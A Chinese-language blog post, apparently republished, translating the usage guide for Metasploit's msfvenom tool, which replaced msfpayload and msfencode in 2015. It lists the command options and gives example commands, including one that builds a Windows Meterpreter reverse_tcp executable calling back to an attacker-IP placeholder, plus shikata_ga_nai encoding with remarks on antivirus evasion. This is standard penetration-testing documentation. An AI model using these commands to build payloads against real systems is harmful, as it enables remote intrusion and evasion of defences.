2015年6月8日，Wei Chen在rapid7官方博客上发文，将于近期移除metasploit-framework版本中的msfencoder和msfpayload，并使用msfvenom取代。官方的msfvenom使用说明戳这里，下面给出翻译的使用说明。
http://www.2cto.com/uploadfile/Collfiles/20150714/20150714102041606.png
最近一次更新的msf中已经去掉了这两个工具，同时，msfcli也即将被移除。
http://www.2cto.com/uploadfile/Collfiles/20150714/20150714102041611.png
kali和BT目前使用的MSF依然是旧版，所以用kali和BT5的小伙伴可以暂时不考虑。在其他平台上编译安装msf的童鞋，可能已经发现这个东西了。
http://www.2cto.com/uploadfile/Collfiles/20150714/20150714102041612.png
msfvenom命令行选项如下：
Options:
    -p, --payload    payload>       指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload，请使用'-'或者stdin指定
    -l, --list       [module_type]   列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all
    -n, --nopsled    length>        为payload预先指定一个NOP滑动长度
    -f, --format     format>        指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表)
    -e, --encoder    [encoder]       指定需要使用的encoder（编码器）
    -a, --arch       architecture>  指定payload的目标架构
        --platform   platform>      指定payload的目标平台
    -s, --space      length>        设定有效攻击荷载的最大长度
    -b, --bad-chars  list>          设定规避字符集，比如: '\x00\xff'
    -i, --iterations count>         指定payload的编码次数
    -c, --add-code   path>          指定一个附加的win32 shellcode文件
    -x, --template   path>          指定一个自定义的可执行文件作为模板
    -k, --keep                       保护模板程序的动作，注入的payload作为一个新的进程运行
        --payload-options            列举payload的标准选项
    -o, --out   path>               保存payload
    -v, --var-name name>            指定一个自定义的变量，以确定输出格式
        --shellest                   最小化生成payload
    -h, --help                       查看帮助选项
        --help-formats               查看msf支持的输出格式列表
生成payload
生成payload，有有两个必须的选项：-p -f
使用-p 来指定要使用的payload。
可以使用下面的命令来查看所有msf可用的payload列表
./msfvenom -l payloads
-p选项也支持使用使用自定义的payload，需要使用 "-"，比如:
cat payload_file.bin | ./msfvenom -p - -a x86 --platform win -e x86/shikata_ga_nai -f raw
使用-f 来指定payload的输出格式
举例：
./msfvenom -p windows/meterpreter/bind_tcp -f exe
使用下面的命令，可以产看msf支持的输出格式
./msfvenom --help-formats
一个典型的msfvenom使用举例如下：
$ ./msfvenom -p windows/meterpreter/reverse_tcp lhost=[Attacker's IP] lport=4444 -f exe -o /tmp/my_payload.exe
对payload进行编码
如果你使用了-b选项（设定了规避字符集），会自动调用编码器。
其他情况下，你需要使用-e选项来使用编码模块，例如：
./msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -f raw
可以使用下面的命令，来查看可用的编码器
./msfvenom -l encoders
你也可以使用-i选项进行多次编码。某些情况下，迭代编码可以起到规避杀毒软件的作用，但你需要知道，编码并没有使用一个真正意义上的AV规避方案。

可以看到-p 和-e ，可见确实集成到这里来了。-e免杀的

http://img.blog.csdn.net/20151118132141615?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQv/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/Center